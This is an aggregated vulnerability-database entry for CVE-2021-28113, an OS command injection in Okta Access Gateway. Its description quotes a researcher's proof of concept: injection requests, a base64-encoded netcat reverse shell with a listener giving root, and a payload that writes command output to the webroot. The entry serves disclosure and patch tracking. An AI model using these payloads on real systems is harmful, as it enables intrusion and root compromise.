Details of VAR-202104-1194

ID

VAR-202104-1194

CVE

CVE-2021-28113

TITLE

Okta Access Gateway In OS Command injection vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2021-005124

DESCRIPTION

A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account. Since the injection occurs when a script is executed with sudo, the commands are ran with root privileges. BUG #1 - relay Command injection as root in Applications via the 'relaydomain' field when passing parameters to generateCert.sh. This is blind injection, so without monitoring logs or local execution instrumentation, the output will not simply returned in the response. Also, the included 'nc' binary that the system image includes has the -e flag available which enables an exploitation easier via connect back shell. [Request] POST /api/v1/app/idp/[valid-IDP] HTTP/1.1 Host: gw-admin.domain.tld Content-Type: application/json;charset=utf-8 X-CSRF-TOKEN: [placeholder] Content-Length: 134 Cookie: CSRF-TOKEN=[placeholder]; JSESSIONID=[placeholder]; SessionCookie=[placeholder] {"settings": {"label":"test", "type":"CERTHEADER2015_APP", "relaydomain":"..$(whoami)", <-- HERE "groups":[], "handlers":{}} ,"policies":[{}]} [Response /w local instrumentation for monitoring] pid=23033 executed [/bin/bash /opt/oag/bin/generateCert.sh -w -d .root ] [Quick testing] "relaydomain":"..$(reboot)" and the system should reboot. [Exploitation for reverse shell] Note: for some bizzare reason, this payload worked for a period of time during testing, but was not generally reproducible afterwards. 1) generate base64 for the connect back command to be executed $ echo -n "nc 10.0.0.111 5000 -e /bin/bash" | base64 bmMgMTAuMTAuMTAuMTc5IDU1NTUgLWUgL2Jpbi9iYXNo 2) start a listener $ nc -l -p 5000 ... 3) make the request with the payload (.. is required due to how it parses domains) ..$(echo${IFS}'bmMgMTAuMC4wLjExMSA1MDAwIC1lIC9iaW4vYmFzaA=='>test;$(base64${IFS}-d${IFS}test)) 4) get a root shell from the server * connection from 10.0.0.77 * python -c 'import pty; pty.spawn("/bin/bash")' [0] root@oag.okta.com;/root# Note: the hostname of the local OAG test system happens to be oag.okta.com and has nothing to do with any Okta company servers. BUG #2 - cookie Command injection as root in Identity Providers via the 'cookieDomain' field when passing parameters to generateCert.sh. [Request] POST /api/v1/setting/idp/local HTTP/1.1 Host: gw-admin.domain.tld Content-Type: application/json;charset=utf-8 X-CSRF-TOKEN: [placeholder] Content-Length: 222 Cookie: CSRF-TOKEN=[placeholder]; JSESSIONID=[placeholder]; SessionCookie=[placeholder] {"subCategory": "IDP_SAML_LOCAL", "json":{ "name":"Local OAG IDP", "host":"https://google.com", "cookieDomain":"$(uname${IFS}-n)", <-- HERE "nameIDFormat":"urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified", "metadata":{}}, "$edit":true} [Response /w local instrumentation for monitoring] pid=22822 executed [/bin/bash /opt/oag/bin/generateCert.sh -w -d Linux oag 3.10.0-957.27.2.el7.x86_64 #1 SMP Mon Jul 29 17:46:05 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux uid=0(root) gid=0(root) groups=0(root) ] [Quick testing] "cookieDomain":"$(reboot)" and the system should reboot. [Exploitation for executing commands with output in the webroot] Same note as the previous one; for some reason, this payload worked for a period of time during testing, but then stopped fully working (the bug was still there just less exploitable). 1) generate base64 for "ls -al /root" to be written to a location accessible via web request $ echo -n "script -q -c ls\$IFS-al\$IFS/root /opt/oag/simpleSAMLphp/www/test.php" | base64 -w0 c2NyaXB0IC1xIC1jIGxzJElGUy1hbCRJRlMvcm9vdCAvb3B0L29hZy9zaW1wbGVTQU1McGhwL3d3dy90ZXN0LnBocA== 2) make the request with the payload $(echo${IFS}'c2NyaXB0IC1xIC1jIGxzJElGUy1hbCRJRlMvcm9vdCAvb3B0L29hZy9zaW1wbGVTQU1McGhwL3d3dy90ZXN0LnBocA=='>test;$(base64${IFS}-d${IFS}test)) 3) check https://gw-admin.domain.tld/auth/test.php for the output of the command === Fix === The cookie bug was a "known issue" and fixed in v2020.9.3 and the relay bug was also fixed and no longer works on the latest v2021.2.1. https://www.okta.com/security-advisories/cve-2021-28113/

Trust: 1.89

sources: NVD: CVE-2021-28113 // JVNDB: JVNDB-2021-005124 // VULHUB: VHN-387508 // VULMON: CVE-2021-28113 // PACKETSTORM: 163428

AFFECTED PRODUCTS

vendor:	okta	model:	access gateway	scope:	lte	version:	2020.8.4	Trust: 1.0
vendor:	okta	model:	access gateway	scope:	eq	version:	2020/9/3 before that	Trust: 0.8
vendor:	okta	model:	access gateway	scope:	eq	version:	-	Trust: 0.8
vendor:	okta	model:	access gateway	scope:	-	version:	-	Trust: 0.8

sources: JVNDB: JVNDB-2021-005124 // NVD: CVE-2021-28113

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2021-28113
value:	MEDIUM
Trust: 1.0
cve@mitre.org:	CVE-2021-28113
value:	MEDIUM
Trust: 1.0
NVD:	CVE-2021-28113
value:	MEDIUM
Trust: 0.8
CNNVD:	CNNVD-202104-105
value:	MEDIUM
Trust: 0.6
VULHUB:	VHN-387508
value:	HIGH
Trust: 0.1
VULMON:	CVE-2021-28113
value:	HIGH
Trust: 0.1

nvd@nist.gov:	CVE-2021-28113
severity:	HIGH
baseScore:	8.7
vectorString:	AV:N/AC:L/AU:S/C:C/I:C/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	SINGLE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	PARTIAL
exploitabilityScore:	8.0
impactScore:	9.5
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.9
VULHUB:	VHN-387508
severity:	HIGH
baseScore:	8.7
vectorString:	AV:N/AC:L/AU:S/C:C/I:C/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	SINGLE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	PARTIAL
exploitabilityScore:	8.0
impactScore:	9.5
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2021-28113
baseSeverity:	MEDIUM
baseScore:	6.7
vectorString:	CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	HIGH
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	LOW
exploitabilityScore:	1.2
impactScore:	5.5
version:	3.1
Trust: 2.0
OTHER:	JVNDB-2021-005124
baseSeverity:	MEDIUM
baseScore:	6.7
vectorString:	CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	HIGH
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	LOW
exploitabilityScore:	NONE
impactScore:	NONE
version:	3.0
Trust: 0.8

sources: VULHUB: VHN-387508 // VULMON: CVE-2021-28113 // JVNDB: JVNDB-2021-005124 // CNNVD: CNNVD-202104-105 // NVD: CVE-2021-28113 // NVD: CVE-2021-28113

PROBLEMTYPE DATA

problemtype:	CWE-78	Trust: 1.1
problemtype:	OS Command injection (CWE-78) [NVD Evaluation ]	Trust: 0.8

sources: VULHUB: VHN-387508 // JVNDB: JVNDB-2021-005124 // NVD: CVE-2021-28113

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 163428 // CNNVD: CNNVD-202104-105

TYPE

operating system commend injection

Trust: 0.6

sources: CNNVD: CNNVD-202104-105

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-387508

PATCH

title:	Okta security advisories (Okta Access Gateway CVE-2021-28113)	url:	https://www.okta.com/security-advisories/cve-2021-28113/	Trust: 0.8
title:	Okta Access Gateway Fixes for operating system command injection vulnerabilities	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146880	Trust: 0.6

sources: JVNDB: JVNDB-2021-005124 // CNNVD: CNNVD-202104-105

EXTERNAL IDS

db:	PACKETSTORM	id:	163428	Trust: 2.7
db:	NVD	id:	CVE-2021-28113	Trust: 2.7
db:	JVNDB	id:	JVNDB-2021-005124	Trust: 0.8
db:	CNNVD	id:	CNNVD-202104-105	Trust: 0.6
db:	VULHUB	id:	VHN-387508	Trust: 0.1
db:	VULMON	id:	CVE-2021-28113	Trust: 0.1

sources: VULHUB: VHN-387508 // VULMON: CVE-2021-28113 // JVNDB: JVNDB-2021-005124 // PACKETSTORM: 163428 // CNNVD: CNNVD-202104-105 // NVD: CVE-2021-28113

REFERENCES

url:	http://packetstormsecurity.com/files/163428/okta-access-gateway-2020.5.5-authenticated-remote-root.html	Trust: 2.6
url:	https://www.okta.com/security-advisories/cve-2021-28113	Trust: 1.8
url:	https://nvd.nist.gov/vuln/detail/cve-2021-28113	Trust: 1.5
url:	https://cwe.mitre.org/data/definitions/78.html	Trust: 0.1
url:	https://nvd.nist.gov	Trust: 0.1
url:	https://google.com",	Trust: 0.1
url:	https://gw-admin.domain.tld/auth/test.php	Trust: 0.1
url:	https://www.okta.com/security-advisories/cve-2021-28113/	Trust: 0.1

sources: VULHUB: VHN-387508 // VULMON: CVE-2021-28113 // JVNDB: JVNDB-2021-005124 // PACKETSTORM: 163428 // CNNVD: CNNVD-202104-105 // NVD: CVE-2021-28113

CREDITS

Jeremy Brown

Trust: 0.1

sources: PACKETSTORM: 163428

SOURCES

db:	VULHUB	id:	VHN-387508
db:	VULMON	id:	CVE-2021-28113
db:	JVNDB	id:	JVNDB-2021-005124
db:	PACKETSTORM	id:	163428
db:	CNNVD	id:	CNNVD-202104-105
db:	NVD	id:	CVE-2021-28113

LAST UPDATE DATE

2024-11-23T22:44:13.734000+00:00

SOURCES UPDATE DATE

db:	VULHUB	id:	VHN-387508	date:	2022-05-27T00:00:00
db:	VULMON	id:	CVE-2021-28113	date:	2021-07-07T00:00:00
db:	JVNDB	id:	JVNDB-2021-005124	date:	2021-12-08T03:07:00
db:	CNNVD	id:	CNNVD-202104-105	date:	2021-07-08T00:00:00
db:	NVD	id:	CVE-2021-28113	date:	2024-11-21T05:59:06.290

SOURCES RELEASE DATE

db:	VULHUB	id:	VHN-387508	date:	2021-04-02T00:00:00
db:	VULMON	id:	CVE-2021-28113	date:	2021-04-02T00:00:00
db:	JVNDB	id:	JVNDB-2021-005124	date:	2021-12-08T00:00:00
db:	PACKETSTORM	id:	163428	date:	2021-07-07T16:10:02
db:	CNNVD	id:	CNNVD-202104-105	date:	2021-04-02T00:00:00
db:	NVD	id:	CVE-2021-28113	date:	2021-04-02T15:15:13.160